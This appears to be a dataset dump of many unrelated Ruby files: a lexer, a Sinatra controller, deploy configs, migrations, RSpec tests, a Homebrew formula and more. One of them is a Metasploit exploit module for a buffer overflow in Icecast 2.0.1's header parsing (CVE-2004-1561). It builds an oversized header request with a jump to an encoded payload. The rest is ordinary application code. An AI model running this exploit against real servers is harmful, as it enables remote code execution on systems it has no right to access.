when "&"
if @ch == "&"
tok = :AND
self.next
elsif isLetter?(@ch)
tok = :ADDRESS
lit = self.scanIdentifier
else
tok = :ILLEGAL
end
when "|"
if @ch == "|"
tok = :OR
self.next
else
tok = :ILLEGAL
end
when "%"
tok = :MOD
when ";"
tok = :SEMICOLON
when "."
if self.isDigit?(@ch)
tok, lit = self.scanReal
else
tok = :DOT
end
when "!"
if @ch == "="
tok = :NOTEQUAL
self.next
else
tok = :BANG
end
when "\"", "'"
tok = :STRING
lit = self.scanString(ch)
when "#"
tok = :COMMENT
lit = self.scanComment
when "@"
tok = :LABEL
lit = self.scanLabel
when '('
tok = :LPAREN
when ')'
tok = :RPAREN
when ','
tok = :COMMA
when '['
tok = :LBRACK
when ']'
tok = :RBRACK
when '{'
tok = :LBRACE
when '}'
tok = :RBRACE
when "\n"
tok = :NEWLINE
when '$'
tok = :SYSTEM
else
tok = :ILLEGAL
lit = ch
end
end
if tok == :DOT
@prevDot = true
else
@prevDot = false
end
return [tok, lit]
end
end
class ScanError < StandardError ; end
end
| 20.291946 | 115 | 0.401356 |
1852d3982046c8c1b315699962852494ae1a4d98 | 3,079 | require './config/environment'
require 'sinatra/flash'
class ApplicationController < Sinatra::Base
configure do
set :public_folder, 'public'
set :views, 'app/views'
enable :sessions
set :session_secret, ENV['SESSION_SECRET']
register Sinatra::Flash
set :show_exceptions, false
end
error 400...500 do
erb :'/errors/400_error'
end
error 500...512 do
erb :'/errors/500_error'
end
get "/" do
if logged_in?
redirect '/quick_picks'
else
erb :mainpage
end
end
error ActiveRecord::RecordNotFound do
redirect '/'
end
helpers do
#-------------user verifications----------------------
def logged_in?
!!session[:user_id]
end
def current_user
@current_user ||= User.find_by_id(session[:user_id])
end
#--------------Marta API Methods--------------------
def all_trains
@all_trains ||= MartaAPIImporter.new.train_api_call
end
def all_unique_stations_from_all_trains
all_trains.collect{|train| train['STATION']}.uniq.sort
end
#array of train hashes that have the current station as a destination
def array_from_station_name
all_trains.select{|obj| obj['STATION'] == current_quick_pick.station_name}
end
#array of directions based on array given from array_from_station_name method
def collect_all_directions_for_current_station
array_from_station_name.collect{|train| train['DIRECTION']}.uniq.sort
end
def incoming_trains_based_on_direction_and_or_rail_line
@trains ||=
if current_quick_pick.direction.nil? && current_quick_pick.rail_line_name.nil?
array_from_station_name
elsif !current_quick_pick.direction.nil? && !current_quick_pick.rail_line_name.nil?
array_from_station_name.select{|obj| obj['DIRECTION'] == current_quick_pick.direction}.select{|train| train['LINE'] == current_quick_pick.rail_line_name}
elsif current_quick_pick.direction
array_from_station_name.select{|obj| obj['DIRECTION'] == current_quick_pick.direction}
elsif current_quick_pick.rail_line_name
array_from_station_name.select{|obj| obj['LINE'] == current_quick_pick.rail_line_name}
end
end
#----------Quick Pick methods-----------------
def current_quick_pick
@current_quick_pick ||= QuickPick.find(params[:id])
end
end
private
def redirect_if_not_logged_in
if !logged_in?
flash[:message] = "You're not logged in!"
redirect to '/users/log_in'
end
end
def redirect_if_cant_create_quick_pick
if !create_quick_pick
flash[:message] = "Could not create quick pick."
redirect '/quick_picks'
end
end
def redirect_if_user_is_not_qp_owner
if !compare_user_and_quick_pick_owner
redirect '/quick_picks'
end
end
def redirect_has_invalid_direction_or_rail_line
if !valid_direction_and_or_rail_line
redirect '/quick_picks'
end
end
end
| 25.87395 | 167 | 0.662553 |
21351bca2d23add4ae97f028cc438bf48dd1d5d5 | 2,839 | ##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Icecast (<= 2.0.1) Header Overwrite (win32)',
'Description' => %q{
This module exploits a buffer overflow in the header parsing
of icecast, discovered by Luigi Auriemma. Sending 32 HTTP
headers will cause a write one past the end of a pointer
array. On win32 this happens to overwrite the saved
instruction pointer, and on linux (depending on compiler,
etc) this seems to generally overwrite nothing crucial (read
not exploitable).
!! This exploit uses ExitThread(), this will leave icecast
thinking the thread is still in use, and the thread counter
won't be decremented. This means for each time your payload
exits, the counter will be left incremented, and eventually
the threadpool limit will be maxed. So you can multihit,
but only till you fill the threadpool.
},
'Author' => [ 'spoonm', 'Luigi Auriemma <aluigi[at]autistici.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1561'],
[ 'OSVDB', '10406'],
[ 'BID', '11271'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html'],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x0d\x0a\x00",
'DisableNops' => true,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { }],
],
'DisclosureDate' => 'Sep 28 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8000)
], self.class)
end
# Interesting that ebp is pushed after the local variables, and the line array
# is right before the saved eip, so overrunning it just by 1 element overwrites
# eip, making an interesting exploit....
# .text:00414C00 sub esp, 94h
# .text:00414C06 push ebx
# .text:00414C07 push ebp
# .text:00414C08 push esi
def exploit
connect
# bounce bounce bouncey bounce.. (our chunk gets free'd, so do a little dance)
# jmp 12
evul = "\xeb\x0c / HTTP/1.1 #{payload.encoded}\r\n"
evul << "Accept: text/html\r\n" * 31;
# jmp [esp+4]
evul << "\xff\x64\x24\x04\r\n"
evul << "\r\n"
sock.put(evul)
handler
disconnect
end
end
| 27.833333 | 82 | 0.611483 |
bb8bbeb3d17d244f8baf23ebe7e49028bfe2c765 | 1,841 | # config valid for current version and patch releases of Capistrano
set :application, "contentsearch"
set :repo_url, "https://github.com/sul-dlss/content_search.git"
# Default branch is :master
ask :branch, proc { `git rev-parse --abbrev-ref HEAD`.chomp }.call unless ENV['DEPLOY']
# Default deploy_to directory is /var/www/my_app_name
set :deploy_to, "/opt/app/contentsearch/contentsearch"
# Default value for :format is :airbrussh.
# set :format, :airbrussh
# You can configure the Airbrussh format using :format_options.
# These are the defaults.
# set :format_options, command_output: true, log_file: "log/capistrano.log", color: :auto, truncate: :auto
# Default value for :pty is false
# set :pty, true
# Default value for :linked_files is []
set :linked_files, ->{ ["config/master.key", "config/honeybadger.yml", "config/newrelic.yml", "tmp/harvest_purl_fetcher_job_last_run_#{fetch(:rails_env)}"] }
# Default value for linked_dirs is []
append :linked_dirs, "log", "tmp/pids", "tmp/cache", "tmp/sockets", "public/system", "config/settings"
# Default value for default_env is {}
# set :default_env, { path: "/opt/ruby/bin:$PATH" }
# Default value for local_user is ENV['USER']
# set :local_user, -> { `git config user.name`.chomp }
# Default value for keep_releases is 5
# set :keep_releases, 5
# Uncomment the following to require manually verifying the host key before first deploy.
# set :ssh_options, verify_host_key: :secure
# honeybadger_env otherwise defaults to rails_env
set :honeybadger_env, fetch(:stage)
# update shared_configs before restarting app
before 'deploy:restart', 'shared_configs:update'
set :whenever_roles, [:indexer]
namespace :deploy do
after :restart, :restart_sidekiq do
on roles(:app) do
sudo :systemctl, "restart", "sidekiq-*", raise_on_non_zero_exit: false
end
end
end
| 33.472727 | 157 | 0.740902 |
21593762122ee68ef145fae10773288c1509f1f4 | 900 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'piliponi/version'
Gem::Specification.new do |spec|
spec.name = "piliponi"
spec.version = Piliponi::VERSION
spec.authors = ["Ace Dimasuhid"]
spec.email = ["[email protected]"]
spec.description = %q{Philippine Mobile Phone Formatter}
spec.summary = %q{Mobile Phone Number Formatter for the Philippines}
spec.homepage = ""
spec.license = "MIT"
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.3"
spec.add_development_dependency "rake"
spec.add_development_dependency "rspec"
end
| 36 | 76 | 0.662222 |
1a3ff18bc4e3057ecc2fb24e4e9ee1d152881288 | 573 | class CreateQuestions < ActiveRecord::Migration[5.0]
def change
create_table :question_templates do |t|
t.integer :number
t.integer :question_type
t.integer :answers_type
t.string :title
t.string :subtitle
t.json :answers
t.json :true_answers
t.json :data
t.belongs_to :test_template
end
create_table :questions do |t|
t.integer :number
t.json :user_answers, default: {}
t.belongs_to :user
t.belongs_to :test, null: true
t.belongs_to :question_template
end
end
end
| 21.222222 | 52 | 0.643979 |
3802f676d1dae5f142f6732671d0a79e89e4856c | 182 | class ChangeContentTypeToPods < ActiveRecord::Migration[5.2]
def up
change_column :pods, :content, :text
end
def down
change_column :pods, :content, :string
end
end
| 18.2 | 60 | 0.714286 |
7ad1cd6891007bf861313c01d7b13ebe44d88dda | 325 | require 'bundler/setup'
Bundler.setup
require_relative '../lib/algorithmia.rb'
def test_client
expect(ENV['ALGORITHMIA_API_KEY']).to_not be_nil
client = Algorithmia.client(ENV['ALGORITHMIA_API_KEY']);
end
RSpec.configure do |config|
config.color = true
config.tty = true
config.formatter = :documentation
end | 21.666667 | 60 | 0.756923 |
bfa53cbb0ef456e8f9c5b6d8ad0fb03054519e8d | 372 | module WebmoneyHq
class Request < ApplicationRecord
validates :daterequest, uniqueness: true
has_many :items, primary_key: :daterequest, foreign_key: :daterequest, dependent: :destroy
def operations
oper = 0
self.items.each do |i|
if i.canaggregate != false
oper += i.count
end
end
oper
end
end
end
| 20.666667 | 94 | 0.63172 |
ff2b283247797c4535b78e9cf63a8cf00f5095b6 | 1,135 | # frozen_string_literal: true
class ArticlesController < ApplicationController
before_action :authenticate_user!, except: %i[index show]
before_action :set_article, only: %i[show edit update destroy]
def index
@articles = Article.all
respond_to do |format|
format.html # index.html.erb
format.json { render json: @articles }
format.xml { render xml: @articles }
# need activemodel-serializers-xml gem for active model objects and
# active record models.
end
end
def show; end
def new
@article = Article.new
end
def edit; end
def create
@article = Article.new(article_params)
@article.user = current_user
if @article.save
redirect_to @article
else
render 'new'
end
end
def update
if @article.update(article_params)
redirect_to @article
else
render 'edit'
end
end
def destroy
@article.destroy
redirect_to root_path
end
private
def article_params
params.require(:article).permit(:title, :text)
end
def set_article
@article = Article.friendly.find(params[:id])
end
end
| 18.606557 | 73 | 0.672247 |
9145d93aecaacc90ebfbac39a57b9f207d3daa09 | 274 | module SupportInterface
class ApplicationChoicesController < SupportInterfaceController
def show
choice = ApplicationChoice.find(params[:application_choice_id])
redirect_to support_interface_application_form_path(choice.application_form)
end
end
end
| 30.444444 | 82 | 0.813869 |
9162c068068ba9492bcef90113760915d91cbcc9 | 566 | require 'spec_helper'
describe GroupMe::Likes do
before do
@client = GroupMe::Client.new(:token => 'TEST')
end
describe '.create_like' do
it 'likes a message' do
stub_post('/messages/3/5/like').to_return(:status => 200)
response = @client.create_like(3, 5)
expect(response).to eq(true)
end
end
describe '.destroy_like' do
it 'likes a message' do
stub_post('/messages/234/8/unlike').to_return(:status => 200)
response = @client.destroy_like(234, 8)
expect(response).to eq(true)
end
end
end
| 18.866667 | 67 | 0.637809 |
33be53ff44bfad2a7bf25768944d4234180a4ec3 | 8,250 | # frozen_string_literal: true
module UiRules
class PackingSpecificationItemRule < Base
def generate_rules
@repo = ProductionApp::PackingSpecificationRepo.new
@bom_repo = MasterfilesApp::BomRepo.new
@setup_repo = ProductionApp::ProductSetupRepo.new
make_form_object
apply_form_values
@rules[:rebin] ||= @repo.get(:product_setups, :rebin, @form_object.product_setup_id) || false
set_show_fields if %i[show].include? @mode
if %i[new edit].include? @mode
common_values_for_fields common_fields
add_behaviours
end
form_name 'packing_specification_item'
end
def set_show_fields # rubocop:disable Metrics/AbcSize
form_object_merge!(@setup_repo.find_product_setup(@form_object.product_setup_id))
form_object_merge!(@repo.extend_packing_specification(@form_object))
@form_object.to_h.each_key do |k|
fields[k] = { renderer: :label }
end
fields[:packed_tm_group] = { renderer: :label, caption: 'Packed TM Group' }
fields[:pallet_label_name] = { renderer: :label, caption: 'Pallet Label' }
fields[:pm_bom] = { renderer: :label, caption: 'PKG BOM' }
fields[:pm_mark] = { renderer: :label, caption: 'PKG Mark' }
fields[:tu_labour_product] = { renderer: :label, caption: 'TU Labour Product' }
fields[:ru_labour_product] = { renderer: :label, caption: 'RU Labour Product' }
fields[:ri_labour_product] = { renderer: :label, caption: 'RI Labour Product' }
fields[:fruit_stickers] = { renderer: :label, caption: 'Fruit Stickers' }
fields[:tu_stickers] = { renderer: :label, caption: 'TU Stickers' }
fields[:ru_stickers] = { renderer: :label, caption: 'RU Stickers' }
fields[:rebin] = { renderer: :label, as_boolean: true }
end
def common_fields # rubocop:disable Metrics/AbcSize
{
product_setup_template_id: { renderer: :select,
caption: 'Product Setup Template',
options: @setup_repo.for_select_product_setup_templates,
disabled_options: @setup_repo.for_select_inactive_product_setup_templates,
prompt: true,
required: true,
hide_on_load: @mode == :edit },
product_setup: { renderer: :label,
caption: 'Product Setup',
hide_on_load: @mode == :new },
product_setup_id: { renderer: :select,
caption: 'Product Setup',
options: @setup_repo.for_select_product_setups(
where: { product_setup_template_id: @form_object.product_setup_template_id }
),
disabled_options: @setup_repo.for_select_inactive_product_setups,
prompt: true,
required: true,
hide_on_load: @mode == :edit },
description: {},
pm_bom_id: { renderer: :select,
caption: 'PKG BOM',
options: @bom_repo.for_select_packing_spec_pm_boms(
where: { std_fruit_size_count_id: @form_object.std_fruit_size_count_id,
basic_pack_id: @form_object.basic_pack_id }
),
disabled_options: @bom_repo.for_select_inactive_pm_boms,
searchable: true,
prompt: true,
required: false },
pm_mark_id: { renderer: :select,
caption: 'PKG Mark',
options: @bom_repo.for_select_pm_marks(
where: { mark_id: @form_object.mark_id }
),
disabled_options: @bom_repo.for_select_inactive_pm_marks,
searchable: true,
prompt: true,
required: false },
tu_labour_product_id: { renderer: :select,
caption: 'TU Labour Product',
options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_TU_LABOUR }
),
disabled_options: @bom_repo.for_select_inactive_pm_products,
prompt: true,
required: false },
ru_labour_product_id: { renderer: :select,
caption: 'RU Labour Product',
options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_RU_LABOUR }
),
disabled_options: @bom_repo.for_select_inactive_pm_products,
prompt: true,
required: false },
ri_labour_product_id: { renderer: :select,
caption: 'RI Labour Product',
options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_RI_LABOUR }
),
disabled_options: @bom_repo.for_select_inactive_pm_products,
prompt: true,
required: false },
fruit_sticker_ids: { renderer: :multi,
caption: 'Fruit Stickers',
options: @bom_repo.for_select_pm_products(
where: { pm_type_code: AppConst::PM_TYPE_STICKER }
),
selected: @form_object.fruit_sticker_ids,
required: false },
tu_sticker_ids: { renderer: :multi,
caption: 'TU Stickers',
options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_TU_STICKER }
),
selected: @form_object.tu_sticker_ids,
required: false },
ru_sticker_ids: { renderer: :multi,
caption: 'RU Stickers',
options: @bom_repo.for_select_pm_products(
where: { subtype_code: AppConst::PM_SUBTYPE_RU_STICKER }
),
selected: @form_object.ru_sticker_ids,
required: false }
}
end
def make_form_object
if @mode == :new
make_new_form_object
return
end
form_object_merge!(@repo.find_packing_specification_item(@options[:id]))
end
def make_new_form_object
@form_object = OpenStruct.new(product_setup_template_id: nil,
description: nil,
pm_bom_id: nil,
pm_mark_id: nil,
mark_id: nil,
product_setup_id: nil,
std_fruit_size_count_id: nil,
basic_pack_code_id: nil,
tu_labour_product_id: nil,
ru_labour_product_id: nil,
fruit_sticker_ids: nil,
tu_sticker_ids: nil,
ru_sticker_ids: nil)
end
private
def add_behaviours
url = '/production/packing_specifications/packing_specification_items'
behaviours do |behaviour|
behaviour.dropdown_change :product_setup_template_id,
notify: [{ url: "#{url}/product_setup_template_changed" }]
behaviour.dropdown_change :product_setup_id,
notify: [{ url: "#{url}/product_setup_changed" }]
end
end
end
end
| 48.245614 | 111 | 0.505212 |
abbdf2e5b2ee49d1e7000453042383732ad9c058 | 635 | class ValidIntValidator < ActiveModel::EachValidator
def validate_each(record, attribute, value)
record.errors.add attribute, (options[:message] || "must be integer, array of integers, or range") unless
valid_int?(value)
end
private
def valid_int?(value)
integer_array?(value) || integer_or_range?(value)
end
def integer_array?(value)
if value.is_a?(String)
value = Sift::ValueParser.new(value: value).array_from_json
end
value.is_a?(Array) && value.any? && value.all? { |v| integer_or_range?(v) }
end
def integer_or_range?(value)
!!(/\A\d+(...\d+)?\z/ =~ value.to_s)
end
end
| 25.4 | 109 | 0.672441 |
e852757385cbf5b3097645fba7f1d313c19c3589 | 1,398 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
describe IO, "#print" do
before :each do
@old_separator = $\
$\ = '->'
@name = tmp("io_print")
end
after :each do
$\ = @old_separator
rm_r @name
end
it "writes $_.to_s followed by $\\ (if any) to the stream if no arguments given" do
o = mock('o')
o.should_receive(:to_s).and_return("mockmockmock")
$_ = o
touch(@name) { |f| f.print }
IO.read(@name).should == "mockmockmock#{$\}"
# Set $_ to something known
string = File.open(__FILE__) {|f| f.gets }
touch(@name) { |f| f.print }
IO.read(@name).should == "#{string}#{$\}"
end
it "calls obj.to_s and not obj.to_str then writes the record separator" do
o = mock('o')
o.should_not_receive(:to_str)
o.should_receive(:to_s).and_return("hello")
touch(@name) { |f| f.print(o) }
IO.read(@name).should == "hello#{$\}"
end
it "writes each obj.to_s to the stream and appends $\\ (if any) given multiple objects" do
o, o2 = Object.new, Object.new
def o.to_s(); 'o'; end
def o2.to_s(); 'o2'; end
touch(@name) { |f| f.print(o, o2) }
IO.read(@name).should == "#{o.to_s}#{o2.to_s}#{$\}"
end
it "raises IOError on closed stream" do
lambda { IOSpecs.closed_io.print("stuff") }.should raise_error(IOError)
end
end
| 25.418182 | 92 | 0.603004 |
614b0cc17b1d09e6aa1f482655bf20d5fba5f901 | 3,436 | require "language/go"
class Cosi < Formula
desc "Implementation of scalable collective signing"
homepage "https://github.com/dedis/cosi"
url "https://github.com/dedis/cosi/archive/0.8.6.tar.gz"
sha256 "007e4c4def13fcecf7301d86f177f098c583151c8a3d940ccb4c65a84413a9eb"
license "AGPL-3.0"
bottle do
cellar :any_skip_relocation
sha256 "30bbb457c0fb67ee264331e434068a4a747ece4cbc536cb75d289a06e93988e2" => :catalina
sha256 "2ddd695441977b1cd435fbae28d9aa864d48b7a90ec24971348d91b5d0e551df" => :mojave
sha256 "00663999a04ee29f52e334022cc828d7ebe89a442f1e713afb2167112f4ebf75" => :high_sierra
end
depends_on "go" => :build
go_resource "github.com/BurntSushi/toml" do
url "https://github.com/BurntSushi/toml.git",
:revision => "f0aeabca5a127c4078abb8c8d64298b147264b55"
end
go_resource "github.com/daviddengcn/go-colortext" do
url "https://github.com/daviddengcn/go-colortext.git",
:revision => "511bcaf42ccd42c38aba7427b6673277bf19e2a1"
end
go_resource "github.com/dedis/crypto" do
url "https://github.com/dedis/crypto.git",
:revision => "d9272cb478c0942e1d60049e6df219cba2067fcd"
end
go_resource "github.com/dedis/protobuf" do
url "https://github.com/dedis/protobuf.git",
:revision => "6948fbd96a0f1e4e96582003261cf647dc66c831"
end
go_resource "github.com/montanaflynn/stats" do
url "https://github.com/montanaflynn/stats.git",
:revision => "60dcacf48f43d6dd654d0ed94120ff5806c5ca5c"
end
go_resource "github.com/satori/go.uuid" do
url "https://github.com/satori/go.uuid.git",
:revision => "f9ab0dce87d815821e221626b772e3475a0d2749"
end
go_resource "golang.org/x/net" do
url "https://go.googlesource.com/net.git",
:revision => "0c607074acd38c5f23d1344dfe74c977464d1257"
end
go_resource "gopkg.in/codegangsta/cli.v1" do
url "https://gopkg.in/codegangsta/cli.v1.git",
:revision => "01857ac33766ce0c93856370626f9799281c14f4"
end
go_resource "gopkg.in/dedis/cothority.v0" do
url "https://gopkg.in/dedis/cothority.v0.git",
:revision => "e5eb384290e5fd98b8cb150a1348661aa2d49e2a"
end
def install
mkdir_p buildpath/"src/github.com/dedis"
ln_s buildpath, buildpath/"src/github.com/dedis/cosi"
ENV["GOPATH"] = "#{buildpath}/Godeps/_workspace:#{buildpath}"
Language::Go.stage_deps resources, buildpath/"src"
system "go", "build", "-o", "cosi"
prefix.install "dedis_group.toml"
bin.install "cosi"
end
test do
port = free_port
(testpath/"config.toml").write <<~EOS
Public = "7b6d6361686d0c76d9f4b40961736eb5d0849f7db3f8bfd8f869b8015d831d45"
Private = "01a80f4fef21db2aea18e5288fe9aa71324a8ad202609139e5cfffc4ffdc4484"
Addresses = ["0.0.0.0:#{port}"]
EOS
(testpath/"group.toml").write <<~EOS
[[servers]]
Addresses = ["127.0.0.1:#{port}"]
Public = "e21jYWhtDHbZ9LQJYXNutdCEn32z+L/Y+Gm4AV2DHUU="
EOS
begin
file = prefix/"README.md"
sig = "README.sig"
pid = fork { exec bin/"cosi", "server", "-config", "config.toml" }
sleep 2
assert_match "Success", shell_output("#{bin}/cosi check -g group.toml")
system bin/"cosi", "sign", "-g", "group.toml", "-o", sig, file
out = shell_output("#{bin}/cosi verify -g group.toml -s #{sig} #{file}")
assert_match "OK", out
ensure
Process.kill("TERM", pid)
end
end
end
| 33.359223 | 93 | 0.701688 |
bb476c413c9c2ac23c9c72f3e40e83ca050d0e5b | 535 | class ScreenshotJob < ApplicationJob
include SuckerPunch::Job
def perform(sandbox)
file = screenshot(sandbox)
sandbox.screenshot.attach(io: file, filename: 'screenshot.jpg')
sandbox.save!
File.delete(file)
end
def screenshot(sandbox)
browser = Ferrum::Browser.new(window_size: [600,300])
browser.goto("#{ENV["RAILS_HOST_PROTOCOL"]}://#{ENV["RAILS_HOST"]}/sandbox/#{sandbox.id}/preview")
browser.screenshot(path: sandbox.id + '.jpg')
browser.quit
File.new(sandbox.id + '.jpg')
end
end
| 24.318182 | 102 | 0.685981 |
ab7e3586e6a5c278a63ed331d5e6e7fc2e112eb5 | 725 | class Admin::PricesController < Admin::ProductController
before_action :_fetch_product
def new
@price = Price.new
end
def create
@price = Price.new _price_params
@price.product_id = @product.id
if @price.save
redirect_to admin_product_prices_path
else
render 'new'
end
end
def edit
@price = Price.find params[:id]
end
def update
@price = Price.find params[:id]
if @price.update(_price_params)
redirect_to admin_product_prices_path
else
render 'edit'
end
end
def destroy
Price.destroy params[:id]
redirect_to admin_product_prices_path
end
private
def _price_params
params.require(:price).permit(:flag, :value)
end
end
| 20.714286 | 56 | 0.686897 |
f73b80b3c65e64260ea3a4b1c3d54dd898207b7e | 9,657 | # frozen_string_literal: true
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
require_relative 'spec_helper'
module Selenium
module WebDriver
describe DevTools, exclusive: {browser: %i[chrome edge firefox_nightly]} do
after { reset_driver! }
it 'sends commands' do
driver.devtools.page.navigate(url: url_for('xhtmlTest.html'))
expect(driver.title).to eq("XHTML Test Page")
end
it 'supports events' do
callback = instance_double(Proc, call: nil)
driver.devtools.page.enable
driver.devtools.page.on(:load_event_fired) { callback.call }
driver.navigate.to url_for('xhtmlTest.html')
sleep 0.5
expect(callback).to have_received(:call).at_least(:once)
end
it 'propagates errors in events' do
driver.devtools.page.enable
driver.devtools.page.on(:load_event_fired) { raise "This is fine!" }
expect { driver.navigate.to url_for('xhtmlTest.html') }.to raise_error(RuntimeError, "This is fine!")
end
context 'authentication', except: {browser: :firefox_nightly,
reason: 'Fetch.enable is not yet supported'} do
let(:username) { SpecSupport::RackServer::TestApp::BASIC_AUTH_CREDENTIALS.first }
let(:password) { SpecSupport::RackServer::TestApp::BASIC_AUTH_CREDENTIALS.last }
it 'on any request' do
driver.register(username: username, password: password)
driver.navigate.to url_for('basicAuth')
expect(driver.find_element(tag_name: 'h1').text).to eq('authorized')
end
it 'based on URL' do
auth_url = url_for('basicAuth')
driver.register(username: username, password: password, uri: /localhost/)
driver.navigate.to auth_url.sub('localhost', '127.0.0.1')
expect { driver.find_element(tag_name: 'h1') }.to raise_error(Error::NoSuchElementError)
driver.navigate.to auth_url
expect(driver.find_element(tag_name: 'h1').text).to eq('authorized')
end
end
it 'notifies about log messages' do
logs = []
driver.on_log_event(:console) { |log| logs.push(log) }
driver.navigate.to url_for('javascriptPage.html')
driver.execute_script("console.log('I like cheese');")
sleep 0.5
driver.execute_script("console.log(true);")
sleep 0.5
driver.execute_script("console.log(null);")
sleep 0.5
driver.execute_script("console.log(undefined);")
sleep 0.5
driver.execute_script("console.log(document);")
sleep 0.5
expect(logs).to include(
an_object_having_attributes(type: :log, args: ['I like cheese']),
an_object_having_attributes(type: :log, args: [true]),
an_object_having_attributes(type: :log, args: [nil]),
an_object_having_attributes(type: :log, args: [{'type' => 'undefined'}])
)
end
it 'notifies about document log messages', except: {browser: :firefox_nightly,
reason: 'Firefox & Chrome parse document differently'} do
logs = []
driver.on_log_event(:console) { |log| logs.push(log) }
driver.navigate.to url_for('javascriptPage.html')
driver.execute_script("console.log(document);")
wait.until { !logs.empty? }
expect(logs).to include(
an_object_having_attributes(type: :log, args: [hash_including('type' => 'object')])
)
end
it 'notifies about document log messages', only: {browser: :firefox_nightly,
reason: 'Firefox & Chrome parse document differently'} do
logs = []
driver.on_log_event(:console) { |log| logs.push(log) }
driver.navigate.to url_for('javascriptPage.html')
driver.execute_script("console.log(document);")
wait.until { !logs.empty? }
expect(logs).to include(
an_object_having_attributes(type: :log, args: [hash_including('location')])
)
end
it 'notifies about exceptions' do
exceptions = []
driver.on_log_event(:exception) { |exception| exceptions.push(exception) }
driver.navigate.to url_for('javascriptPage.html')
driver.find_element(id: 'throwing-mouseover').click
wait.until { exceptions.any? }
exception = exceptions.first
expect(exception.description).to include('Error: I like cheese')
expect(exception.stacktrace).not_to be_empty
end
it 'notifies about DOM mutations', except: {browser: :firefox_nightly,
reason: 'Runtime.addBinding not yet supported'} do
mutations = []
driver.on_log_event(:mutation) { |mutation| mutations.push(mutation) }
driver.navigate.to url_for('dynamic.html')
driver.find_element(id: 'reveal').click
wait.until { mutations.any? }
mutation = mutations.first
expect(mutation.element).to eq(driver.find_element(id: 'revealed'))
expect(mutation.attribute_name).to eq('style')
expect(mutation.current_value).to eq('')
expect(mutation.old_value).to eq('display:none;')
end
context 'network interception', except: {browser: :firefox_nightly,
reason: 'Fetch.enable is not yet supported'} do
it 'continues requests' do
requests = []
driver.intercept do |request, &continue|
requests << request
continue.call(request)
end
driver.navigate.to url_for('html5Page.html')
expect(driver.title).to eq('HTML5')
expect(requests).not_to be_empty
end
it 'changes requests' do
driver.intercept do |request, &continue|
uri = URI(request.url)
if uri.path.end_with?('one.js')
uri.path = '/devtools_request_interception_test/two.js'
request.url = uri.to_s
end
continue.call(request)
end
driver.navigate.to url_for('devToolsRequestInterceptionTest.html')
driver.find_element(tag_name: 'button').click
expect(driver.find_element(id: 'result').text).to eq('two')
end
it 'continues responses' do
responses = []
driver.intercept do |request, &continue|
continue.call(request) do |response|
responses << response
end
end
driver.navigate.to url_for('html5Page.html')
expect(driver.title).to eq('HTML5')
expect(responses).not_to be_empty
end
it 'changes responses' do
driver.intercept do |request, &continue|
continue.call(request) do |response|
response.body << '<h4 id="appended">Appended!</h4>' if request.url.include?('html5Page.html')
end
end
driver.navigate.to url_for('html5Page.html')
expect(driver.find_elements(id: "appended")).not_to be_empty
end
end
context 'script pinning' do
before do
driver.navigate.to url_for('xhtmlTest.html')
end
it 'allows to pin script' do
script = driver.pin_script('return document.title;')
expect(driver.pinned_scripts).to eq([script])
expect(driver.execute_script(script)).to eq('XHTML Test Page')
end
it 'ensures pinned script is available on new pages' do
script = driver.pin_script('return document.title;')
driver.navigate.to url_for('formPage.html')
expect(driver.execute_script(script)).to eq('We Leave From Here')
end
it 'allows to unpin script' do
script = driver.pin_script('return document.title;')
driver.unpin_script(script)
expect(driver.pinned_scripts).to be_empty
expect { driver.execute_script(script) }.to raise_error(Error::JavascriptError)
end
it 'ensures unpinned scripts are not available on new pages' do
script = driver.pin_script('return document.title;')
driver.unpin_script(script)
driver.navigate.to url_for('formPage.html')
expect { driver.execute_script(script) }.to raise_error(Error::JavascriptError)
end
it 'handles arguments in pinned script' do
script = driver.pin_script('return arguments;')
element = driver.find_element(id: 'id1')
expect(driver.execute_script(script, 1, true, element)).to eq([1, true, element])
end
it 'supports async pinned scripts' do
script = driver.pin_script('arguments[0]()')
expect { driver.execute_async_script(script) }.not_to raise_error
end
end
end
end
end
| 38.783133 | 115 | 0.623175 |
4a6f7ab3fcbb976495bc67e7602668a0084d6762 | 6,822 | shared_examples 'sp handoff after identity verification' do |sp|
include SamlAuthHelper
include IdvHelper
let(:email) { '[email protected]' }
context 'sign up' do
let(:user) { User.find_with_email(email) }
it 'requires idv and hands off correctly' do
visit_idp_from_sp_with_ial2(sp)
register_user(email)
expect(current_path).to eq idv_jurisdiction_path
fill_out_idv_jurisdiction_ok
click_idv_continue
expect(current_path).to eq idv_session_path
complete_idv_profile_ok(user)
click_acknowledge_personal_key
expect(page).to have_content t(
